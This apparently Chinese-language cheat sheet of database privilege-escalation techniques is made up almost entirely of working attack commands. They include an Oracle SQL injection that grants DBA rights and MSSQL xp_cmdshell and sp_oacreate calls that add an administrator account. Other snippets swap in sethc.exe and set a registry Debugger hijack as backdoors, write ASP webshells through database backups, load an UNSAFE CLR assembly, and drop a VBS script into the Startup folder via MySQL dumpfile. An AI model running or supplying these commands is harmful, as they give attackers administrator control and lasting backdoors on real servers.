SQL>create or replace function pwn return vaarchar2
authid current_user is pragma autonomous_transaction;
begin
execute immediate 'grant dba to quan';
return '';
end;
/

SQL>grant execute on pwn to public;
/

SQL>begin
sys.dbms_cdc_subscribe.activate_subscription('''||quan.pwn()||''');
end;
/

SQL>set role dba;

use auxiliary/sqli/oracle/dbms_cdc_subscribe.activate_subscription

set dbuser quan

set dbpass quan123

set sid orcl

set rhost xxxxx

set sql grant dba to quan

Copy运行应用程序
修改注册表文件
安装或者卸载程序
安装设备驱动程序
增加或者删除用户账户
复制文件到windows目录

Copy#SERVER  
Windows   2008r2    7601        **  link OPENED AS SYSTEM  ** 
Windows   2012r2    9600        **  link OPENED AS SYSTEM  ** 
Windows   2016      14393       **  link OPENED AS SYSTEM  ** 
Windows   2019      17763        link NOT opened 
Copy#WORKSTATION  
Windows   7  SP1     7601        **  link OPENED AS SYSTEM  ** 
Windows   8          9200        **  link OPENED AS SYSTEM  ** 
Windows   8.1        9600        **  link OPENED AS SYSTEM  ** 
Windows   10   1511      10240    **  link OPENED AS SYSTEM  ** 
Windows   10   1607      14393    **  link OPENED AS SYSTEM  ** 
Windows   10   1703      15063    link NOT opened 
Windows   10   1709      16299    link NOT opened

select @@version

select @@version

exec master..xp_msver;

sp_helpsrvrolemember

select db_name();

xp_availablemedia

select IS_SRVROLEMEMBER('sysadmin') #判断是否为sa权限
select IS_MEMBER('db_owner') #判断是否为dba权限

exec sp_configure 'show advanced options', 1;reconfigure;
exec sp_configure 'xp_cmdshell',1;reconfigure;

exec sp_configure 'show advanced options', 1;reconfigure;
exec sp_configure 'xp_cmdshell', 0;reconfigure;

EXEC sp_configure 'show advanced options',0;GO RECONFIGURE;

DECLARE @js int
EXEC sp_OACreate 'ScriptControl',@js OUT
EXEC sp_OASetProperty @js,'Language','JavaScript'
ActiveXObject("Shell.Users");z=o.create("user");z.changePassword("pass","");z.setting("AccountType")=3;'

declare @aa int
exec sp_oacreate 'scripting.filesystemobject' @aa out
exec sp_oamethod @aa, 'moveFile',null,'c:\temp\ipmi.log','c:\temp\ipmi1.log';

declare @o int
exec sp_oacreate 'scripting.filesystemobject', @o out
exec sp_oamethod @o,'copyfile',null,'c:\windows\explorer.exe','c:\windows\system32\sethc.exe';

DECLARE @Result int
DECLARE @FSO_Token int
EXEC @Result = sp_OACreate 'Scripting.FileSystemObject', @FSO_Token OUTPUT
EXEC @Result = sp_OAMethod @FSO_Token, 'DeleteFile',NULL,'c:\Documents and Settings\All Users\ [开始] 菜单\程序\启动\user.bat'
EXEC @Result = sp_OADestrop @FSO_Token

exec master..xp_cmdshell 'ver'

exec master.dbo.xp_cmdshell 'net user quan 123456 /add'

exec master.dbo.xp_cmdshell 'net localgroup administrators quan /add'

exec sp_configure 'show advanced options', 1;RECONFIGURE;
exec sp_configure 'Ola Automation Procedures' , 1;RECONFIGURE;

declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net user quan 123456 /add'
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net localgroup administrators quan /add'

declare @o int
exec sp_oacreate 'scripting.filesystemobject', @o out 
exec sp_oamethod @o, 'copyfile',null,'c:\windows\explorer.exe' ,'c:\windows\system32\sethc.exe';
declare @o int
exec sp_oacreate 'scripting.filesystemobject', @o out 
exec sp_oamethod @o, 'copyfile',null,'c:\windows\system32\sethc.exe' ,'c:\windows\system32\dllcache\sethc.exe';

use master
declare @o int
exec sp_oacreate 'wscript.shell',@o out
exec sp_oamethod @o,'run',null,'cmd /c "net user" > c:\test.tmp'

 USE msdb
EXEC sp_add_job @job_name = 'GetSystemOnSQL', www.webshell.cc
@enabled = 1,
@description = 'This will give a low privileged user access to
xp_cmdshell',
@delete_level = 1

EXEC sp_add_jobstep @job_name = 'GetSystemOnSQL',
@step_name = 'Exec my sql',
@subsystem = 'TSQL',
@command = 'exec master..xp_execresultset N''select ''''exec
master..xp_cmdshell "dir > c:\agent-job-results.txt"'''''',N''Master'''
EXEC sp_add_jobserver @job_name = 'GetSystemOnSQL',
@server_name = 'SERVER_NAME'
EXEC sp_start_job @job_name = 'GetSystemOnSQL'

select count(*) from master.dbo.sysobjects where xtyoe='x' and name='xp_cmdshell'

exec master..xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Jet\4.0\Engines','SandBoxMode','REG_DWORD',1

select * from openrowset('microsoft.jet.oledb.4.0' ,';database=c:\windows\system32\ias\ias.mdb' ,'select shell("cmd.exe /c net user quan 121345 /add")')

select * from openrowset('microsoft.jet.oledb.4.0' ,';database=c:\windows\system32\ias\ias.mdb' ,'select shell("cmd.exe /c net localgroup administrators quan /add")')

exec master..xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\WindowsNT\CurrentVersion\Image File Execution Options\sethc.EXE','Debugger','REG_SZ','C:\WINDOWS\explorer.exe';

backup database 库名 to disk = 'c:\quan.bak';//完整备份一次(保存位置可以改)
create table cmd (a image);
insert into cmd(a) values(<%execute(request("a"))%>);//创建表cmd并插入一句话木马
backup database 库名 to disk='目标位置\hhh.asp' WITH DIFFERENTIAL,FORMAT;//进行差异备份

alter database 数据库名称 set RECOVERY FULL;
create table cmd (a image);
backup log 数据库名称 to disk = 'E:\wwwroot\asp_sqli\hack.asp' with init;
insert into cmd (a) values ('<%%25Execute(request("go"))%%25>');

exec master..xp_cmdshell 'ver'

exec master..xp_dirtree 'c:\',1,1

exec master..xp_dirtree 'C:\Documents and Settings\Administrator\「开始」菜单\程序\启动',1,1

SELECT DB_NAME()

alter database [northwind] set RECOVERY FULL--
create table cmd (a image)--
backup log [northwind] to disk = 'c:\cmd1' with init--
insert into cmd (a) values (0x130A0D0A404563686F206F66660D0A406364202577696E646972250D0A4064656C20646972202F73202F612073657468632E6578650D0A40636F7079202577696E646972255C73797374656D33325C636D642E657865202577696E646972255C73797374656D33325C73657468632E657865202F790D0A40636F7079202577696E646972255C73797374656D33325C636D642E657865202577696E646972255C73797374656D33325C646C6C63616368655C73657468632E657865202F790D0A)--
backup log [northwind] to disk = 'C:\Documents and Settings\Administrator\「开始」菜单\程序\启动\start.bat'--
drop table cmd--

exec master..xp_dirtree 'C:\Documents and Settings\Administrator\「开始」菜单\程序\启动',1,1

CREATE ASSEMBLY AssemblyName from ‘DLLPath’

CREATE ASSEMBLY AssemblyName from 文件十六进制流

using System;
using System.Data;
using System.Data.SqlClient;
using System.Data.SqlTypes;
using Microsoft.SqlServer.Server;
using System.Collections.Generic;
using System.Text;
using System.Threading.Tasks;
public partial class StoredProcedures
{
    [Microsoft.SqlServer.Server.SqlProcedure]
    public static void SqlStoredProcedure1 ()
    {
        // 在此处放置代码
        System.Diagnostics.Process process = new System.Diagnostics.Process();
        process.StartInfo.WindowStyle = System.Diagnostics.ProcessWindowStyle.Hidden;
        process.StartInfo.FileName = "cmd.exe";
        process.StartInfo.Arguments = "/C whoami > c:\\temp\\1.txt";
        process.Start();
    }
}

CREATE ASSEMBLY [ExecCode]
    AUTHORIZATION [dbo]
    FROM 0x4D5A[...snip...]
    WITH PERMISSION_SET = UNSAFE;

CREATE PROCEDURE [dbo].[SqlStoredProcedure1]
AS EXTERNAL NAME [ExecCode].[StoredProcedures].[SqlStoredProcedure1]

EXEC sp_configure N'show advanced options', N'1' 
RECONFIGURE WITH OVERRIDE

EXEC sp_configure N'clr enabled', N'1'
RECONFIGURE WITH OVERRIDE 

EXEC sp_configure N'show advanced options', N'0' 
RECONFIGURE WITH OVERRIDE

alter database [master] set TRUSTWORTHY on
EXEC sp_changedbowner 'sa'

EXEC [dbo].[SqlStoredProcedure1];

DROP PROCEDURE [dbo].[SqlStoredProcedure1];
DROP ASSEMBLY ExecCode

setwsnetwork=CreateObject(“WSCRIPT.NETWORK”)
os=”WinNT://”&wsnetwork.ComputerName
Set ob=GetObject(os)
Setoe=GetObject(os&”/Administrators,group”)
Set od=ob.Create(“user”,”quan”)
od.SetPassword “123456”
od.SetInfo
Set of=GetObject(os&“/quan”,user)
oe.add os&“/quan”

insert into secist values(“set wshshell=createobject(“”wscript.shell””)”);
insert into secist values(“a=wshshell.run(“”cmd.exe /c net user quan 123456 /add“”,0)”);
insert into secist values(“b=wshshell.run(“”cmd.exe /c net localgroup administrators quan /add“”,0)”);

select * from secist into dumpfile “C:\Documents and Settings\All Users\「开始」菜单\程序\启动\quan.vbs”;

• 服务器的操作系统
• 操作系统位数情况
• 当前计算机用户权限
• 当前计算机补丁情况
• 当前计算机进程情况
• 当前网站支持的脚本类型
• 找可读可写目录，上传提权exp，调用cmd执行exp进行提权